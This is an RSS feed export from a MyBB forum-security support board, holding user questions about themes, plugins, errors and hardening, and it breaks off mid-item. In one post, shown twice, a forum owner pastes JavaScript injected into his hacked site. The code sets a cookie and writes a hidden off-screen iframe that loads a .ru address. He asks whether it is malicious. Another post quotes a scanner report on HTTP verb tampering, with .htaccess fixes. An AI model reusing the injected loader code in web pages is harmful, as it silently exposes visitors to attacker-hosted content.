<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/">
	<channel>
		<title><![CDATA[MyBB Security - All Forums]]></title>
		<link>http://www.mybbsecurity.net/</link>
		<description><![CDATA[MyBB Security - http://www.mybbsecurity.net]]></description>
		<pubDate>Tue, 21 May 2013 13:22:48 +0000</pubDate>
		<generator>MyBB</generator>
		<item>
			<title><![CDATA[What Change I Have To Do To Get Like This]]></title>
			<link>http://www.mybbsecurity.net/topic-what-change-i-have-to-do-to-get-like-this</link>
			<pubDate>Mon, 06 May 2013 21:33:04 +0100</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-what-change-i-have-to-do-to-get-like-this</guid>
			<description><![CDATA[i`m Using The Cure Theme Template How To Make Look Like This User Profile In Posts<br />
<br />
<br />
<a href="http://hostpic.planetogeeks.com/?v=1.jpg" target="_blank"><img src="http://hostpic.planetogeeks.com/thumbs/1.jpg" border="0" alt="[Image: 1.jpg]" /></a><br />
<br />
<br />
My Forum<br />
<br />
<a href="http://hostpic.planetogeeks.com/?v=2lml.jpg" target="_blank"><img src="http://hostpic.planetogeeks.com/thumbs/2lml.jpg" border="0" alt="[Image: 2lml.jpg]" /></a>]]></description>
			<content:encoded><![CDATA[i`m Using The Cure Theme Template How To Make Look Like This User Profile In Posts<br />
<br />
<br />
<a href="http://hostpic.planetogeeks.com/?v=1.jpg" target="_blank"><img src="http://hostpic.planetogeeks.com/thumbs/1.jpg" border="0" alt="[Image: 1.jpg]" /></a><br />
<br />
<br />
My Forum<br />
<br />
<a href="http://hostpic.planetogeeks.com/?v=2lml.jpg" target="_blank"><img src="http://hostpic.planetogeeks.com/thumbs/2lml.jpg" border="0" alt="[Image: 2lml.jpg]" /></a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Problem With Cloudfare Manger]]></title>
			<link>http://www.mybbsecurity.net/topic-problem-with-cloudfare-manger</link>
			<pubDate>Sun, 05 May 2013 22:39:10 +0100</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-problem-with-cloudfare-manger</guid>
			<description><![CDATA[I have installed the plugin but after activating the plugin i`ant got the cloudfare manger settings i cant see any option over the whole board setting except configuration settings<br />
<br />
<a href="http://hostpic.planetogeeks.com/?v=1.png" target="_blank"><img src="http://hostpic.planetogeeks.com/thumbs/1.png" border="0" alt="[Image: 1.png]" /></a><br />
<br />
&lt;snip&gt;]]></description>
			<content:encoded><![CDATA[I have installed the plugin but after activating the plugin i`ant got the cloudfare manger settings i cant see any option over the whole board setting except configuration settings<br />
<br />
<a href="http://hostpic.planetogeeks.com/?v=1.png" target="_blank"><img src="http://hostpic.planetogeeks.com/thumbs/1.png" border="0" alt="[Image: 1.png]" /></a><br />
<br />
&lt;snip&gt;]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[JS insertion]]></title>
			<link>http://www.mybbsecurity.net/topic-js-insertion</link>
			<pubDate>Fri, 12 Apr 2013 01:30:35 +0100</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-js-insertion</guid>
			<description><![CDATA[Hello<br />
today i found that my forum has been hacked,and all .js files has the following code:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>/*214afaae*/(function(){<br />
function stripos (f_haystack, f_needle, f_offset) {<br />
 var haystack = (f_haystack + '').toLowerCase();<br />
 var needle = (f_needle + '').toLowerCase();<br />
 var index = 0;<br />
 if ((index = haystack.indexOf(needle, f_offset)) !== -1) {<br />
&nbsp;&nbsp;return index;<br />
 }<br />
 return false;<br />
}<br />
function zzz_check_ua(){<br />
 var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','An&#8203;droid','Firefox/18.0','Firefox/18.0.1','Firefox/18.0.2','Firefox/19.0','Firefox/19.0.1','Firefox/19.0.2','Firefox/20.0','SymbianOS'];<br />
 var blackUA = false;<br />
 for (var i in blackList) {<br />
&nbsp;&nbsp;if (stripos(navigator.userAgent, blackList[i])) {<br />
&nbsp;&nbsp; blackUA = true;<br />
&nbsp;&nbsp; break;<br />
&nbsp;&nbsp;}<br />
 }<br />
 return blackUA;<br />
}<br />
function setCookie(name, value, expires) {<br />
 var date = new Date( new Date().getTime() + expires*1000 );<br />
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();<br />
}<br />
function getCookie(name) {<br />
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([&#92;.&#36;?*|{}&#92;(&#92;)&#92;[&#92;]&#92;&#92;/&#92;+^])/g, '&#92;&#36;1') + "=([^;]*)" ));<br />
 return matches ? decodeURIComponent(matches[1]) : undefined;<br />
}<br />
if (!zzz_check_ua()) {<br />
 var cookie = getCookie('b1004dc22');<br />
 if (cookie == undefined) {<br />
&nbsp;&nbsp;setCookie('b1004dc22', true, 432000);&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp;&nbsp;document.write('&lt;iframe height="110" width="110" style="position:absolute;left:-1000px;top:-1000px;" src="http://mindbogglingupbeat.ru/g3ewbj44.49L9Y0B?default"&gt;&lt;/iframe&gt;');<br />
 }<br />
};<br />
})();/*eaa795220*/п»ї/*</code></div></div>
As i understand, this code just adds the cookie? Is it malicious?<br />
And as i see now even if i delete all those js includes, the next time i open the forum it starts over, and the its again adeed to the .js files. So how can i find the source of the spreading?<br />
Thanx in advance.]]></description>
			<content:encoded><![CDATA[Hello<br />
today i found that my forum has been hacked,and all .js files has the following code:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>/*214afaae*/(function(){<br />
function stripos (f_haystack, f_needle, f_offset) {<br />
 var haystack = (f_haystack + '').toLowerCase();<br />
 var needle = (f_needle + '').toLowerCase();<br />
 var index = 0;<br />
 if ((index = haystack.indexOf(needle, f_offset)) !== -1) {<br />
&nbsp;&nbsp;return index;<br />
 }<br />
 return false;<br />
}<br />
function zzz_check_ua(){<br />
 var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','An&#8203;droid','Firefox/18.0','Firefox/18.0.1','Firefox/18.0.2','Firefox/19.0','Firefox/19.0.1','Firefox/19.0.2','Firefox/20.0','SymbianOS'];<br />
 var blackUA = false;<br />
 for (var i in blackList) {<br />
&nbsp;&nbsp;if (stripos(navigator.userAgent, blackList[i])) {<br />
&nbsp;&nbsp; blackUA = true;<br />
&nbsp;&nbsp; break;<br />
&nbsp;&nbsp;}<br />
 }<br />
 return blackUA;<br />
}<br />
function setCookie(name, value, expires) {<br />
 var date = new Date( new Date().getTime() + expires*1000 );<br />
 document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();<br />
}<br />
function getCookie(name) {<br />
 var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([&#92;.&#36;?*|{}&#92;(&#92;)&#92;[&#92;]&#92;&#92;/&#92;+^])/g, '&#92;&#36;1') + "=([^;]*)" ));<br />
 return matches ? decodeURIComponent(matches[1]) : undefined;<br />
}<br />
if (!zzz_check_ua()) {<br />
 var cookie = getCookie('b1004dc22');<br />
 if (cookie == undefined) {<br />
&nbsp;&nbsp;setCookie('b1004dc22', true, 432000);&nbsp;&nbsp;&nbsp;&nbsp;<br />
&nbsp;&nbsp;document.write('&lt;iframe height="110" width="110" style="position:absolute;left:-1000px;top:-1000px;" src="http://mindbogglingupbeat.ru/g3ewbj44.49L9Y0B?default"&gt;&lt;/iframe&gt;');<br />
 }<br />
};<br />
})();/*eaa795220*/п»ї/*</code></div></div>
As i understand, this code just adds the cookie? Is it malicious?<br />
And as i see now even if i delete all those js includes, the next time i open the forum it starts over, and the its again adeed to the .js files. So how can i find the source of the spreading?<br />
Thanx in advance.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Theme: need some small changes!]]></title>
			<link>http://www.mybbsecurity.net/topic-theme-need-some-small-changes</link>
			<pubDate>Sun, 31 Mar 2013 05:27:48 +0100</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-theme-need-some-small-changes</guid>
			<description><![CDATA[Hi there :) I want to fix this theme: <a href="http://myskins.org/mydownloads.php?action=view_down&amp;did=6" target="_blank">http://myskins.org/mydownloads.php?actio...down&did=6</a><br />
<br />
and I want to customize this: <a href="http://postimg.org/image/uys1cvaq9/" target="_blank">http://postimg.org/image/uys1cvaq9/</a><br />
<br />
as you can see the welcome message with AdminCP, UserCP, View your posts, View your Thread etc. And that box has just plain text :( I want to use buttons instead of just text!<br />
Can you help me please? :)]]></description>
			<content:encoded><![CDATA[Hi there :) I want to fix this theme: <a href="http://myskins.org/mydownloads.php?action=view_down&amp;did=6" target="_blank">http://myskins.org/mydownloads.php?actio...down&did=6</a><br />
<br />
and I want to customize this: <a href="http://postimg.org/image/uys1cvaq9/" target="_blank">http://postimg.org/image/uys1cvaq9/</a><br />
<br />
as you can see the welcome message with AdminCP, UserCP, View your posts, View your Thread etc. And that box has just plain text :( I want to use buttons instead of just text!<br />
Can you help me please? :)]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Is there a plugin that creates random users?]]></title>
			<link>http://www.mybbsecurity.net/topic-is-there-a-plugin-that-creates-random-users</link>
			<pubDate>Thu, 14 Feb 2013 02:01:28 +0000</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-is-there-a-plugin-that-creates-random-users</guid>
			<description><![CDATA[Guys,<br />
<br />
I was wondering if their was a plugin whereas it would randomly create users on the forum through the ACP. This plugin would be really cool in making your site look really, really big. Does anyone know of such a plugin?<br />
<br />
-Money]]></description>
			<content:encoded><![CDATA[Guys,<br />
<br />
I was wondering if their was a plugin whereas it would randomly create users on the forum through the ACP. This plugin would be really cool in making your site look really, really big. Does anyone know of such a plugin?<br />
<br />
-Money]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[How do you disable HTML is posts?]]></title>
			<link>http://www.mybbsecurity.net/topic-how-do-you-disable-html-is-posts</link>
			<pubDate>Mon, 04 Feb 2013 19:46:49 +0000</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-how-do-you-disable-html-is-posts</guid>
			<description><![CDATA[Hey guys, in a thread below me Nathan said to disable HTML in posts to help stop code injections. I'm up to date on my forum and only have two forum plugins so I feel pretty safe. I'm just not feeling 100% with the bad HTML filter. Could anyone tell me how to disable HTML in posts?]]></description>
			<content:encoded><![CDATA[Hey guys, in a thread below me Nathan said to disable HTML in posts to help stop code injections. I'm up to date on my forum and only have two forum plugins so I feel pretty safe. I'm just not feeling 100% with the bad HTML filter. Could anyone tell me how to disable HTML in posts?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[problem in creating new thread]]></title>
			<link>http://www.mybbsecurity.net/topic-problem-in-creating-new-thread</link>
			<pubDate>Fri, 18 Jan 2013 07:26:59 +0000</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-problem-in-creating-new-thread</guid>
			<description><![CDATA[hi <br />
i am facing an error in creating new thread <br />
<img src="http://i.imgur.com/8rAeY.jpg" border="0" alt="[Image: 8rAeY.jpg]" /><br />
<br />
file verification result<br />
newthread.php	Changed<br />
i have uploaded new newthread.php but no effect]]></description>
			<content:encoded><![CDATA[hi <br />
i am facing an error in creating new thread <br />
<img src="http://i.imgur.com/8rAeY.jpg" border="0" alt="[Image: 8rAeY.jpg]" /><br />
<br />
file verification result<br />
newthread.php	Changed<br />
i have uploaded new newthread.php but no effect]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Can't Delete Reps / Move Multiple Threads]]></title>
			<link>http://www.mybbsecurity.net/topic-can-t-delete-reps-move-multiple-threads</link>
			<pubDate>Thu, 17 Jan 2013 21:45:02 +0000</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-can-t-delete-reps-move-multiple-threads</guid>
			<description><![CDATA[Hey all, I don't know why, but recently I've been getting two problems with my forum.<br />
<br />
Problem one:<br />
When I try to delete a reputation, I get the message: "Authorization code mismatch. Are you accessing this function correctly? Please go back and try again." <br />
Can anyone help me fix this?<br />
<br />
Problem two:<br />
<br />
When I try to move multiple threads at once, or do anything to multiple threads at once for that matter, I get this error: "Sorry, but you did not select any threads to perform inline moderation on, or your previous moderation session has expired (Automatically after 1 hour of inactivity). Please select some threads and try again." <br />
<br />
Can anyone help me with this please? It's really making it hard to remove the spam and rep abuse from my forum.]]></description>
			<content:encoded><![CDATA[Hey all, I don't know why, but recently I've been getting two problems with my forum.<br />
<br />
Problem one:<br />
When I try to delete a reputation, I get the message: "Authorization code mismatch. Are you accessing this function correctly? Please go back and try again." <br />
Can anyone help me fix this?<br />
<br />
Problem two:<br />
<br />
When I try to move multiple threads at once, or do anything to multiple threads at once for that matter, I get this error: "Sorry, but you did not select any threads to perform inline moderation on, or your previous moderation session has expired (Automatically after 1 hour of inactivity). Please select some threads and try again." <br />
<br />
Can anyone help me with this please? It's really making it hard to remove the spam and rep abuse from my forum.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Issue in template]]></title>
			<link>http://www.mybbsecurity.net/topic-issue-in-template</link>
			<pubDate>Wed, 16 Jan 2013 09:33:40 +0000</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-issue-in-template</guid>
			<description><![CDATA[When I want add my cod to theme I see this error:<br />
<br />
<blockquote><cite>Quote:</cite>A potential security issue was found in the template. Please review your changes or contact the MyBB Group for support.</blockquote>
<br />
This is my code:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>&lt;!-- BEGIN STANDARD TAG - 468 x 60 - ROS: Run-of-site - DO NOT MODIFY --&gt;<br />
&lt;SCRIPT TYPE="text/javascript" SRC="http://ad.adorika.com/st?ad_type=ad&amp;ad_size=468x60&amp;section=4011032&amp;pub_url=&#36;{PUB_URL}"&gt;&lt;/SCRIPT&gt;<br />
&lt;!-- END TAG --&gt;</code></div></div>
<br />
How fix it?]]></description>
			<content:encoded><![CDATA[When I want add my cod to theme I see this error:<br />
<br />
<blockquote><cite>Quote:</cite>A potential security issue was found in the template. Please review your changes or contact the MyBB Group for support.</blockquote>
<br />
This is my code:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>&lt;!-- BEGIN STANDARD TAG - 468 x 60 - ROS: Run-of-site - DO NOT MODIFY --&gt;<br />
&lt;SCRIPT TYPE="text/javascript" SRC="http://ad.adorika.com/st?ad_type=ad&amp;ad_size=468x60&amp;section=4011032&amp;pub_url=&#36;{PUB_URL}"&gt;&lt;/SCRIPT&gt;<br />
&lt;!-- END TAG --&gt;</code></div></div>
<br />
How fix it?]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[I Need working Forums Icons Plugin]]></title>
			<link>http://www.mybbsecurity.net/topic-i-need-working-forums-icons-plugin</link>
			<pubDate>Fri, 11 Jan 2013 00:18:54 +0000</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-i-need-working-forums-icons-plugin</guid>
			<description><![CDATA[Hey guys i'm having trouble finding a Forums Icons plugin. Could anyone link me to the correct plugin for this and have it updated so it works with the latest MyBB? Thanks.<br />
<br />
-Zero]]></description>
			<content:encoded><![CDATA[Hey guys i'm having trouble finding a Forums Icons plugin. Could anyone link me to the correct plugin for this and have it updated so it works with the latest MyBB? Thanks.<br />
<br />
-Zero]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Reference Book 403]]></title>
			<link>http://www.mybbsecurity.net/topic-reference-book-403</link>
			<pubDate>Sun, 06 Jan 2013 20:38:27 +0000</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-reference-book-403</guid>
			<description><![CDATA[Just to let you know, this: <a href="http://www.mybbsecurity.net/docs/" target="_blank">http://www.mybbsecurity.net/docs/</a> = 403 Forbidden]]></description>
			<content:encoded><![CDATA[Just to let you know, this: <a href="http://www.mybbsecurity.net/docs/" target="_blank">http://www.mybbsecurity.net/docs/</a> = 403 Forbidden]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[GamerForumz]]></title>
			<link>http://www.mybbsecurity.net/topic-gamerforumz</link>
			<pubDate>Wed, 02 Jan 2013 06:59:20 +0000</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-gamerforumz</guid>
			<description><![CDATA[Hey guys I have just established enough of my site just to get it published. I have a few plugins that I checked manually for SQL injection vulnerabilities and found none. I also did about 15 different techniques in securing my forum. For the next few days, I'll be adding an achievements plugin, economy plugin, and a forum icons plugin. But that's only for the features. Besides that I'll be focusing on security. I have a cron job that automatically backs up the database every hour so that is a really nice pro. Anyways back to my site.<br />
<br />
Basically as the title says, it's a designed gaming forum for just gaming in general. It's going to very professional and will have a lot of talk around it soon. Rules &amp; guidelines are setup, now all I need to do is touch up and get some traffic! If you guys want to help me with my site your welcome to tell your friends, and at the least create an account there. Hopefully when it's completely setup my plans will go as intended to make one of the biggest gaming forums online. Happy New Years everyone and may 2013 be good to you. <img src="images/smilies/smiley-cool.png" style="vertical-align: middle;" border="0" alt="Smiley-cool" title="Smiley-cool" /><br />
<br />
<span style="font-size: large;"><span style="font-weight: bold;">http://www.gamerforumz.com</span></span>]]></description>
			<content:encoded><![CDATA[Hey guys I have just established enough of my site just to get it published. I have a few plugins that I checked manually for SQL injection vulnerabilities and found none. I also did about 15 different techniques in securing my forum. For the next few days, I'll be adding an achievements plugin, economy plugin, and a forum icons plugin. But that's only for the features. Besides that I'll be focusing on security. I have a cron job that automatically backs up the database every hour so that is a really nice pro. Anyways back to my site.<br />
<br />
Basically as the title says, it's a designed gaming forum for just gaming in general. It's going to very professional and will have a lot of talk around it soon. Rules &amp; guidelines are setup, now all I need to do is touch up and get some traffic! If you guys want to help me with my site your welcome to tell your friends, and at the least create an account there. Hopefully when it's completely setup my plans will go as intended to make one of the biggest gaming forums online. Happy New Years everyone and may 2013 be good to you. <img src="images/smilies/smiley-cool.png" style="vertical-align: middle;" border="0" alt="Smiley-cool" title="Smiley-cool" /><br />
<br />
<span style="font-size: large;"><span style="font-weight: bold;">http://www.gamerforumz.com</span></span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Password Protecting & Bruteforce]]></title>
			<link>http://www.mybbsecurity.net/topic-password-protecting-bruteforce</link>
			<pubDate>Wed, 02 Jan 2013 05:05:33 +0000</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-password-protecting-bruteforce</guid>
			<description><![CDATA[Alright guys I have a small question i'm not sure if i'm going to say correctly. I have added a password protect on my Admin panel so if someone finds my directory, they first have to enter a User - Pass. Then they need to brute my admin login. I found it really safe to put a password protect on the admin directory, but is there a way hackers can get past that Password Protect besides brute force? I haven't found any XSS or SQL injection vulnerabilities yet.]]></description>
			<content:encoded><![CDATA[Alright guys I have a small question i'm not sure if i'm going to say correctly. I have added a password protect on my Admin panel so if someone finds my directory, they first have to enter a User - Pass. Then they need to brute my admin login. I found it really safe to put a password protect on the admin directory, but is there a way hackers can get past that Password Protect besides brute force? I haven't found any XSS or SQL injection vulnerabilities yet.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Cloudflare plugin - errors on overview page]]></title>
			<link>http://www.mybbsecurity.net/topic-cloudflare-plugin-errors-on-overview-page</link>
			<pubDate>Mon, 24 Dec 2012 00:18:53 +0000</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-cloudflare-plugin-errors-on-overview-page</guid>
			<description><![CDATA[I have the following errors on the overview page of cloudflare manager beta 3.1:<br />
<!-- start: postbit_attachments_attachment -->
<br /><img src="images/attachtypes/image.gif" border="0" alt=".png" />&nbsp;&nbsp;<a href="attachment.php?aid=43" target="_blank">cloudflare.png</a> (Size: 46.1 KB / Downloads: 38)
<!-- end: postbit_attachments_attachment --><br />
Any help is appreciated]]></description>
			<content:encoded><![CDATA[I have the following errors on the overview page of cloudflare manager beta 3.1:<br />
<!-- start: postbit_attachments_attachment -->
<br /><img src="images/attachtypes/image.gif" border="0" alt=".png" />&nbsp;&nbsp;<a href="attachment.php?aid=43" target="_blank">cloudflare.png</a> (Size: 46.1 KB / Downloads: 38)
<!-- end: postbit_attachments_attachment --><br />
Any help is appreciated]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Need help fixing site vulns]]></title>
			<link>http://www.mybbsecurity.net/topic-need-help-fixing-site-vulns</link>
			<pubDate>Sun, 23 Dec 2012 20:22:49 +0000</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-need-help-fixing-site-vulns</guid>
			<description><![CDATA[Hey all,<br />
Recently, someone has been threatening to hack my forum, after our pentester posted a public thread revealing some exploits,<br />
<br />
Here are here his threads:<br />
<br />
Secure your MyBB config:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>Go To Your Hosting<br />
<br />
<br />
Create A Redirect Ex:<br />
[code]www.example.com/inc/config.php</code></div></div>
to<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>www.example.com</code></div></div>
<br />
Then password protect:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>www.example.com/inc/config.php</code></div></div>
[/code]<br />
<br />
<br />
Secure your htaccess:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>Alert group:<br />
Insecure configuration in .htaccess file<br />
WebsiteDefender test:<br />
During this test WebsiteDefender analyses your website’s .htaccess file for insecure configurations such as HTTP verb tampering.<br />
Repercussions:<br />
An insecure .htaccess file can compromise website security by enabling a hacker to bypass web authentication by using a technique called HTTP verb tampering — using a HTTP verb that is unspecified in Apache’s Limit directive in your .htacess file. HTTP verb tampering is mostly used to bypass any authentication/authorization mechanisms or to assist in other web attacks. Many developers, in their aim to secure or limit access to specific locations, unwillingly give more access than they initially thought. HTTP verbs can include the GET, POST, TRACE, TRACK, PUT, DELETE. These can be used by an attacker in order to execute an attack by exploiting any misconfigured rules in an access control or authorization file or policy, which in our case is the .htaccess file. A common scenario that allows HTTP verb tampering could be failure to block or properly control unused HTTP verbs. This possibly might allow any malicious user to bypass any security measures, such as Web Application Firewalls (WAFs), container-level URL and application-layer URL authentication/authorization, and gain control over the website which will eventually allow any malicious actions to be performed unobstructed.<br />
A simple method to perform such an attack is to use the HEAD HTTP verb. Many developers try to limit the most common verbs GET and POST, however the HEAD verb — based on the Request For Comment (RFC) 2616 — is handled in exactly the same way as the GET verb without returning any data. Thus an attacker can send a HEAD request which when executed will confirm the vulnerability.<br />
Fix:<br />
There are two solutions to prevent HTTP Verb tampering attacks.<br />
1. Limit HTTP Verbs<br />
There are two ways how you can limit which HTTP Verbs should be handled by your server.<br />
Limit directive – By using the limit Apache directive, you specify which HTTP verbs (methods) you want to allow.<br />
LimitExcept directive – Using the LimitExcept directive, you are allowing all HTTP Verbs (methods) apart the ones specified. A &lt;LimitExcept&gt; section should always be used in preference to a &lt;Limit&gt; section when restricting access, since a &lt;LimitExcept&gt; section provides protection against arbitrary methods.<br />
For this example below we will use the LimitExcept directive and allow all apart from PUT and DELETE. This configuration is ideal for a normal website which does not allow file uploads and deletion of files. For example:<br />
<br />
[php]&lt;LimitExcept PUT DELETE&gt;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Require valid-user<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/LimitExcept&gt; [/php]<br />
This will request authentication on any HTTP method except for PUT and DELETE.<br />
2. Always ask for Authentication<br />
The second method is to completely remove any type of HTTP method restrictions (Limit or LimitExcept) from access control and authorization rules, and adjust your .htaccess configuration to ALWAYS ask for authentication. Example of a .htaccess file follows:<br />
[php]<br />
AuthUserFile C:&#92;xampp&#92;htdocs&#92;Acuart&#92;.htpasswd<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;AuthName "Authorization Required"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;AuthType Basic<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;require valid-user [/php]<br />
This method is preferred since the web server will request the visitor to authenticate when sending any type of HTTP request, irrelevant of the HTTP verb being used.</code></div></div>
<br />
<br />
That's a direct copy-paste of the two threads he made about my site's security, and now that a hacker who dislikes my site knows about them, I could really do with some help on how to fix them. Thanks all for reading.]]></description>
			<content:encoded><![CDATA[Hey all,<br />
Recently, someone has been threatening to hack my forum, after our pentester posted a public thread revealing some exploits,<br />
<br />
Here are here his threads:<br />
<br />
Secure your MyBB config:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>Go To Your Hosting<br />
<br />
<br />
Create A Redirect Ex:<br />
[code]www.example.com/inc/config.php</code></div></div>
to<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>www.example.com</code></div></div>
<br />
Then password protect:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>www.example.com/inc/config.php</code></div></div>
[/code]<br />
<br />
<br />
Secure your htaccess:<br />
<div class="codeblock">
<div class="title">Code:<br />
</div><div class="body" dir="ltr"><code>Alert group:<br />
Insecure configuration in .htaccess file<br />
WebsiteDefender test:<br />
During this test WebsiteDefender analyses your website’s .htaccess file for insecure configurations such as HTTP verb tampering.<br />
Repercussions:<br />
An insecure .htaccess file can compromise website security by enabling a hacker to bypass web authentication by using a technique called HTTP verb tampering — using a HTTP verb that is unspecified in Apache’s Limit directive in your .htacess file. HTTP verb tampering is mostly used to bypass any authentication/authorization mechanisms or to assist in other web attacks. Many developers, in their aim to secure or limit access to specific locations, unwillingly give more access than they initially thought. HTTP verbs can include the GET, POST, TRACE, TRACK, PUT, DELETE. These can be used by an attacker in order to execute an attack by exploiting any misconfigured rules in an access control or authorization file or policy, which in our case is the .htaccess file. A common scenario that allows HTTP verb tampering could be failure to block or properly control unused HTTP verbs. This possibly might allow any malicious user to bypass any security measures, such as Web Application Firewalls (WAFs), container-level URL and application-layer URL authentication/authorization, and gain control over the website which will eventually allow any malicious actions to be performed unobstructed.<br />
A simple method to perform such an attack is to use the HEAD HTTP verb. Many developers try to limit the most common verbs GET and POST, however the HEAD verb — based on the Request For Comment (RFC) 2616 — is handled in exactly the same way as the GET verb without returning any data. Thus an attacker can send a HEAD request which when executed will confirm the vulnerability.<br />
Fix:<br />
There are two solutions to prevent HTTP Verb tampering attacks.<br />
1. Limit HTTP Verbs<br />
There are two ways how you can limit which HTTP Verbs should be handled by your server.<br />
Limit directive – By using the limit Apache directive, you specify which HTTP verbs (methods) you want to allow.<br />
LimitExcept directive – Using the LimitExcept directive, you are allowing all HTTP Verbs (methods) apart the ones specified. A &lt;LimitExcept&gt; section should always be used in preference to a &lt;Limit&gt; section when restricting access, since a &lt;LimitExcept&gt; section provides protection against arbitrary methods.<br />
For this example below we will use the LimitExcept directive and allow all apart from PUT and DELETE. This configuration is ideal for a normal website which does not allow file uploads and deletion of files. For example:<br />
<br />
[php]&lt;LimitExcept PUT DELETE&gt;<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Require valid-user<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;/LimitExcept&gt; [/php]<br />
This will request authentication on any HTTP method except for PUT and DELETE.<br />
2. Always ask for Authentication<br />
The second method is to completely remove any type of HTTP method restrictions (Limit or LimitExcept) from access control and authorization rules, and adjust your .htaccess configuration to ALWAYS ask for authentication. Example of a .htaccess file follows:<br />
[php]<br />
AuthUserFile C:&#92;xampp&#92;htdocs&#92;Acuart&#92;.htpasswd<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;AuthName "Authorization Required"<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;AuthType Basic<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;require valid-user [/php]<br />
This method is preferred since the web server will request the visitor to authenticate when sending any type of HTTP request, irrelevant of the HTTP verb being used.</code></div></div>
<br />
<br />
That's a direct copy-paste of the two threads he made about my site's security, and now that a hacker who dislikes my site knows about them, I could really do with some help on how to fix them. Thanks all for reading.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[MyBB 1.6.9 Security Release]]></title>
			<link>http://www.mybbsecurity.net/topic-mybb-1-6-9-security-release</link>
			<pubDate>Sat, 15 Dec 2012 10:52:03 +0000</pubDate>
			<guid isPermaLink="false">http://www.mybbsecurity.net/topic-mybb-1-6-9-security-release</guid>
